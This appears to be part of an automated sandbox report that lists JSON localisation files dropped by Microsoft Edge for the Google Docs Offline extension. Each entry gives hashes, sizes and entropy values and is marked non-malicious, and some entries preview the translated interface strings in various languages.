                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2771
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                              MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1160
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3264
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3235
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1895
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1042
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2535
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1028
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2778
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1719
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                              MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                              MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3830
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                              MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1898
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                              MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                              SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                              SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                              SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                              MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                              SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                              SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                              SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                              MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                              SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                              SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                              SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2766
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                              MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):978
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                              Malicious:false
